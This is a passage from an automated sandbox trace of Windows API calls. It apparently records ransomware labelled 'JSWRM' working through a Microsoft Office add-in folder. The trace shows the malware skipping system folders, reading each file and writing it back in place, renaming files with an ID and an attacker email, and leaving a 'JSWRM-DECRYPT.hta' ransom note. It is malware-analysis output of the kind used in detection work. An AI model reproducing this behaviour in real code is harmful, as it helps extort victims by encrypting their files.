dwFlags=0x0, lpMem=0x235ea8 | out: hHeap=0x1e0000) returned 1 [0126.724] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x235ea8 [0126.724] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x236018 [0126.724] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x236ae0 [0126.724] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x235f60 [0126.724] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x106) returned 0x23dee0 [0126.724] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x235f60 | out: hHeap=0x1e0000) returned 1 [0126.724] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\ADDINS\\PowerPivot Excel Add-in\\ms\\JSWRM-DECRYPT.hta" (normalized: "c:\\program files\\microsoft office\\root\\office16\\addins\\powerpivot excel add-in\\ms\\jswrm-decrypt.hta")) returned 0x20 [0126.724] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23dee0 | out: hHeap=0x1e0000) returned 1 [0126.724] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x236ae0 | out: hHeap=0x1e0000) returned 1 [0126.724] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x236468 [0126.724] FindFirstFileW (in: lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\ADDINS\\PowerPivot Excel Add-in\\ms\\*.*", lpFindFileData=0x345e258 | out: lpFindFileData=0x345e258*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf0089415, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0x167cf4d5, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x4231ed6b, ftLastWriteTime.dwHighDateTime=0x1d53d3c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x77c29fd0, dwReserved1=0xcb6ad372, cFileName=".", cAlternateFileName="")) returned 0x231e00 [0126.725] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0126.725] FindNextFileW (in: hFindFile=0x231e00, lpFindFileData=0x345e258 | out: lpFindFileData=0x345e258*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf0089415, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0x167cf4d5, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x4231ed6b, ftLastWriteTime.dwHighDateTime=0x1d53d3c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x77c29fd0, dwReserved1=0xcb6ad372, cFileName="..", cAlternateFileName="")) returned 1 [0126.725] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0126.725] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0126.725] FindNextFileW (in: hFindFile=0x231e00, lpFindFileData=0x345e258 | out: lpFindFileData=0x345e258*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x4231ed6b, ftCreationTime.dwHighDateTime=0x1d53d3c, ftLastAccessTime.dwLowDateTime=0x4231ed6b, ftLastAccessTime.dwHighDateTime=0x1d53d3c, ftLastWriteTime.dwLowDateTime=0x4231ed6b, ftLastWriteTime.dwHighDateTime=0x1d53d3c, nFileSizeHigh=0x0, nFileSizeLow=0x230c, dwReserved0=0x77c29fd0, dwReserved1=0xcb6ad372, cFileName="JSWRM-DECRYPT.hta", cAlternateFileName="JSWRM-~1.HTA")) returned 1 [0126.725] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2=".") returned 1 [0126.725] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="..") returned 1 [0126.725] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="...") returned 1 [0126.725] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="windows") returned -1 [0126.725] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="recovery") returned -1 [0126.725] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="perflogs") returned -1 [0126.725] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="documents and settings") returned 1 [0126.725] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="$RECYCLE.BIN") returned 1 [0126.725] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="system volume information") returned -1 [0126.726] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="msocache") returned -1 [0126.726] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0d8 [0126.726] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM-DECRYPT.hta", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0126.726] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x240f70 [0126.726] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM-DECRYPT.hta", cchWideChar=17, lpMultiByteStr=0x240f70, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM-DECRYPT.hta", lpUsedDefaultChar=0x0) returned 17 [0126.726] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0d8 | out: hHeap=0x1e0000) returned 1 [0126.726] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0126.726] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM-DECRYPT.hta", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0126.726] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2411c8 [0126.726] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM-DECRYPT.hta", cchWideChar=17, lpMultiByteStr=0x2411c8, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM-DECRYPT.hta", lpUsedDefaultChar=0x0) returned 17 [0126.726] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0126.726] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xd0) returned 0x22f0d8 [0126.726] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x236468 | out: hHeap=0x1e0000) returned 1 [0126.726] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2411c8 | out: hHeap=0x1e0000) returned 1 [0126.726] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x240f70 | out: hHeap=0x1e0000) returned 1 [0126.726] FindNextFileW (in: hFindFile=0x231e00, lpFindFileData=0x345e258 | out: lpFindFileData=0x345e258*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x167cf4d5, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x167cf4d5, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x167cf4d5, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x1050, dwReserved0=0x77c29fd0, dwReserved1=0xcb6ad372, cFileName="LocalizedStrings.xml", cAlternateFileName="LOCALI~1.XML")) returned 1 [0126.726] lstrcmpiW (lpString1="LocalizedStrings.xml", lpString2=".") returned 1 [0126.726] lstrcmpiW (lpString1="LocalizedStrings.xml", lpString2="..") returned 1 [0126.726] lstrcmpiW (lpString1="LocalizedStrings.xml", lpString2="...") returned 1 [0126.726] lstrcmpiW (lpString1="LocalizedStrings.xml", lpString2="windows") returned -1 [0126.726] lstrcmpiW (lpString1="LocalizedStrings.xml", lpString2="recovery") returned -1 [0126.726] lstrcmpiW (lpString1="LocalizedStrings.xml", lpString2="perflogs") returned -1 [0126.726] lstrcmpiW (lpString1="LocalizedStrings.xml", lpString2="documents and settings") returned 1 [0126.726] lstrcmpiW (lpString1="LocalizedStrings.xml", lpString2="$RECYCLE.BIN") returned 1 [0126.726] lstrcmpiW (lpString1="LocalizedStrings.xml", lpString2="system volume information") returned -1 [0126.726] lstrcmpiW (lpString1="LocalizedStrings.xml", lpString2="msocache") returned -1 [0126.726] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0126.726] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="LocalizedStrings.xml", cchWideChar=20, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 20 [0126.726] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2410d8 [0126.726] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="LocalizedStrings.xml", cchWideChar=20, lpMultiByteStr=0x2410d8, cbMultiByte=20, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="LocalizedStrings.xml", lpUsedDefaultChar=0x0) returned 20 [0126.726] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0126.726] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0126.726] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="LocalizedStrings.xml", cchWideChar=20, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 20 [0126.726] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241218 [0126.726] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="LocalizedStrings.xml", cchWideChar=20, lpMultiByteStr=0x241218, cbMultiByte=20, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="LocalizedStrings.xml", lpUsedDefaultChar=0x0) returned 20 [0126.727] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0126.727] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xd0) returned 0x22ea18 [0126.727] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22f0d8 | out: hHeap=0x1e0000) returned 1 [0126.727] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0126.727] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e22c, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0126.727] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xd0) returned 0x22e358 [0126.727] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\ADDINS\\PowerPivot Excel Add-in\\ms\\LocalizedStrings.xml" (normalized: "c:\\program files\\microsoft office\\root\\office16\\addins\\powerpivot excel add-in\\ms\\localizedstrings.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x338 [0126.727] GetFileSizeEx (in: hFile=0x338, lpFileSize=0x345e1c0 | out: lpFileSize=0x345e1c0*=4176) returned 1 [0126.727] SetFilePointer (in: hFile=0x338, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0126.727] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x1050) returned 0x279338 [0126.727] ReadFile (in: hFile=0x338, lpBuffer=0x279338, nNumberOfBytesToRead=0x1050, lpNumberOfBytesRead=0x345e1cc, lpOverlapped=0x0 | out: lpBuffer=0x279338*, lpNumberOfBytesRead=0x345e1cc*=0x1050, lpOverlapped=0x0) returned 1 [0126.729] SetFilePointer (in: hFile=0x338, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0126.729] WriteFile (in: hFile=0x338, lpBuffer=0x279338*, nNumberOfBytesToWrite=0x1050, lpNumberOfBytesWritten=0x345e1c8, lpOverlapped=0x0 | out: lpBuffer=0x279338*, lpNumberOfBytesWritten=0x345e1c8*=0x1050, lpOverlapped=0x0) returned 1 [0126.729] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x279338 | out: hHeap=0x1e0000) returned 1 [0126.729] CloseHandle (hObject=0x338) returned 1 [0126.729] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xd0) returned 0x22f6c0 [0126.729] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0126.729] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0126.729] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d260, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0126.729] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d298 [0126.729] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0126.729] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0126.729] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a240 [0126.729] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a240, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0126.729] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a240 | out: hHeap=0x1e0000) returned 1 [0126.730] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xe0) returned 0x22af10 [0126.730] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x14e) returned 0x21c578 [0126.730] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22af10 | out: hHeap=0x1e0000) returned 1 [0126.730] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d298 | out: hHeap=0x1e0000) returned 1 [0126.730] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\ADDINS\\PowerPivot Excel Add-in\\ms\\LocalizedStrings.xml" (normalized: "c:\\program files\\microsoft office\\root\\office16\\addins\\powerpivot excel add-in\\ms\\localizedstrings.xml"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\ADDINS\\PowerPivot Excel Add-in\\ms\\LocalizedStrings.xml.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\office16\\addins\\powerpivot excel add-in\\ms\\localizedstrings.xml.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0126.730] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x21c578 | out: hHeap=0x1e0000) returned 1 [0126.731] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22f6c0 | out: hHeap=0x1e0000) returned 1 [0126.731] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22e358 | out: hHeap=0x1e0000) returned 1 [0126.731] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241218 | out: hHeap=0x1e0000) returned 1 [0126.731] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2410d8 | out: hHeap=0x1e0000) returned 1 [0126.731] FindNextFileW (in: hFindFile=0x231e00, lpFindFileData=0x345e258 | out: lpFindFileData=0x345e258*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x60f38e4, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x60f38e4, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x6165f55, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0xd030, dwReserved0=0x77c29fd0, dwReserved1=0xcb6ad372, cFileName="Microsoft.AnalysisServices.Common.resources.dll", cAlternateFileName="MIE3DA~1.DLL")) returned 1 [0126.731] lstrcmpiW (lpString1="Microsoft.AnalysisServices.Common.resources.dll", lpString2=".") returned 1 [0126.731] lstrcmpiW (lpString1="Microsoft.AnalysisServices.Common.resources.dll", lpString2="..") returned 1 [0126.731] lstrcmpiW (lpString1="Microsoft.AnalysisServices.Common.resources.dll", lpString2="...") returned 1 [0126.731] lstrcmpiW (lpString1="Microsoft.AnalysisServices.Common.resources.dll", lpString2="windows") returned -1 [0126.731] lstrcmpiW (lpString1="Microsoft.AnalysisServices.Common.resources.dll", lpString2="recovery") returned -1 [0126.731] lstrcmpiW (lpString1="Microsoft.AnalysisServices.Common.resources.dll", lpString2="perflogs") returned -1 [0126.731] lstrcmpiW (lpString1="Microsoft.AnalysisServices.Common.resources.dll", lpString2="documents and settings") returned 1 [0126.731] lstrcmpiW (lpString1="Microsoft.AnalysisServices.Common.resources.dll", lpString2="$RECYCLE.BIN") returned 1 [0126.731] lstrcmpiW (lpString1="Microsoft.AnalysisServices.Common.resources.dll", lpString2="system volume information") returned -1 [0126.731] lstrcmpiW (lpString1="Microsoft.AnalysisServices.Common.resources.dll", lpString2="msocache") returned -1 [0126.731] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x60) returned 0x2330f8 [0126.731] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.AnalysisServices.Common.resources.dll", cchWideChar=47, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 47 [0126.731] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22ce70 [0126.731] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.AnalysisServices.Common.resources.dll", cchWideChar=47, lpMultiByteStr=0x22ce70, cbMultiByte=47, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Microsoft.AnalysisServices.Common.resources.dll", lpUsedDefaultChar=0x0) returned 47 [0126.731] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2330f8 | out: hHeap=0x1e0000) returned 1 [0126.731] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x60) returned 0x2331c8 [0126.731] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.AnalysisServices.Common.resources.dll", cchWideChar=47, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 47 [0126.731] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d298 [0126.731] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.AnalysisServices.Common.resources.dll", cchWideChar=47, lpMultiByteStr=0x22d298, cbMultiByte=47, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Microsoft.AnalysisServices.Common.resources.dll", lpUsedDefaultChar=0x0) returned 47 [0126.731] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2331c8 | out: hHeap=0x1e0000) returned 1 [0126.731] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x110) returned 0x23e110 [0126.731] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22ea18 | out: hHeap=0x1e0000) returned 1 [0126.731] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d298 | out: hHeap=0x1e0000) returned 1 [0126.731] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22ce70 | out: hHeap=0x1e0000) returned 1 [0126.731] FindNextFileW (in: hFindFile=0x231e00, lpFindFileData=0x345e258 | out: lpFindFileData=0x345e258*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xffd6924a, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xffd6924a, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xffd6924a, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x38ad0, dwReserved0=0x77c29fd0, dwReserved1=0xcb6ad372, cFileName="Microsoft.AnalysisServices.Common.Wizard.resources.dll", cAlternateFileName="MIDF86~1.DLL")) returned 1 [0126.731] lstrcmpiW (lpString1="Microsoft.AnalysisServices.Common.Wizard.resources.dll", lpString2=".") returned 1 [0126.731] lstrcmpiW (lpString1="Microsoft.AnalysisServices.Common.Wizard.resources.dll", lpString2="..") returned 1 [0126.731] lstrcmpiW (lpString1="Microsoft.AnalysisServices.Common.Wizard.resources.dll", lpString2="...") returned 1 [0126.731] lstrcmpiW (lpString1="Microsoft.AnalysisServices.Common.Wizard.resources.dll", lpString2="windows") returned -1 [0126.732] lstrcmpiW (lpString1="Microsoft.AnalysisServices.Common.Wizard.resources.dll", lpString2="recovery") returned -1 [0126.732] lstrcmpiW (lpString1="Microsoft.AnalysisServices.Common.Wizard.resources.dll", lpString2="perflogs") returned -1 [0126.732] lstrcmpiW (lpString1="Microsoft.AnalysisServices.Common.Wizard.resources.dll", lpString2="documents and settings") returned 1 [0126.732] lstrcmpiW (lpString1="Microsoft.AnalysisServices.Common.Wizard.resources.dll", lpString2="$RECYCLE.BIN") returned 1 [0126.732] lstrcmpiW (lpString1="Microsoft.AnalysisServices.Common.Wizard.resources.dll", lpString2="system volume information") returned -1 [0126.732] lstrcmpiW (lpString1="Microsoft.AnalysisServices.Common.Wizard.resources.dll", lpString2="msocache") returned -1 [0126.732] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x70) returned 0x209788 [0126.732] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.AnalysisServices.Common.Wizard.resources.dll", cchWideChar=54, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 54 [0126.732] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20dde8 [0126.732] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.AnalysisServices.Common.Wizard.resources.dll", cchWideChar=54, lpMultiByteStr=0x20dde8, cbMultiByte=54, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Microsoft.AnalysisServices.Common.Wizard.resources.dll", lpUsedDefaultChar=0x0) returned 54 [0126.732] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x209788 | out: hHeap=0x1e0000) returned 1 [0126.732] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x70) returned 0x2092d8 [0126.732] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.AnalysisServices.Common.Wizard.resources.dll", cchWideChar=54, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 54 [0126.732] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20d578 [0126.732] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.AnalysisServices.Common.Wizard.resources.dll", cchWideChar=54, lpMultiByteStr=0x20d578, cbMultiByte=54, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Microsoft.AnalysisServices.Common.Wizard.resources.dll", lpUsedDefaultChar=0x0) returned 54 [0126.732] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2092d8 | out: hHeap=0x1e0000) returned 1 [0126.732] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x120) returned 0x23f970 [0126.732] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23e110 | out: hHeap=0x1e0000) returned 1 [0126.732] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20d578 | out: hHeap=0x1e0000) returned 1 [0126.732] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20dde8 | out: hHeap=0x1e0000) returned 1 [0126.732] FindNextFileW (in: hFindFile=0x231e00, lpFindFileData=0x345e258 | out: lpFindFileData=0x345e258*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x7d7750, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x7d7750, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x7d7750, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x14030, dwReserved0=0x77c29fd0, dwReserved1=0xcb6ad372, cFileName="Microsoft.AnalysisServices.Excel.BackEnd.resources.dll", cAlternateFileName="MI038C~1.DLL")) returned 1 [0126.732] lstrcmpiW (lpString1="Microsoft.AnalysisServices.Excel.BackEnd.resources.dll", lpString2=".") returned 1 [0126.732] lstrcmpiW (lpString1="Microsoft.AnalysisServices.Excel.BackEnd.resources.dll", lpString2="..") returned 1 [0126.732] lstrcmpiW (lpString1="Microsoft.AnalysisServices.Excel.BackEnd.resources.dll", lpString2="...") returned 1 [0126.732] lstrcmpiW (lpString1="Microsoft.AnalysisServices.Excel.BackEnd.resources.dll", lpString2="windows") returned -1 [0126.732] lstrcmpiW (lpString1="Microsoft.AnalysisServices.Excel.BackEnd.resources.dll", lpString2="recovery") returned -1 [0126.732] lstrcmpiW (lpString1="Microsoft.AnalysisServices.Excel.BackEnd.resources.dll", lpString2="perflogs") returned -1 [0126.732] lstrcmpiW (lpString1="Microsoft.AnalysisServices.Excel.BackEnd.resources.dll", lpString2="documents and settings") returned 1 [0126.732] lstrcmpiW (lpString1="Microsoft.AnalysisServices.Excel.BackEnd.resources.dll", lpString2="$RECYCLE.BIN") returned 1 [0126.732] lstrcmpiW (lpString1="Microsoft.AnalysisServices.Excel.BackEnd.resources.dll", lpString2="system volume information") returned -1 [0126.732] lstrcmpiW (lpString1="Microsoft.AnalysisServices.Excel.BackEnd.resources.dll", lpString2="msocache") returned -1 [0126.732] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x70) returned 0x209620 [0126.732] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.AnalysisServices.Excel.BackEnd.resources.dll", cchWideChar=54, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 54 [0126.732] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20dba8 [0126.733] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.AnalysisServices.Excel.BackEnd.resources.dll", cchWideChar=54, lpMultiByteStr=0x20dba8, cbMultiByte=54, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Microsoft.AnalysisServices.Excel.BackEnd.resources.dll", lpUsedDefaultChar=0x0) returned 54 [0126.733] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x209620 | out: hHeap=0x1e0000) returned 1 [0126.733] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x70) returned 0x2094b8 [0126.733] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.AnalysisServices.Excel.BackEnd.resources.dll", cchWideChar=54, 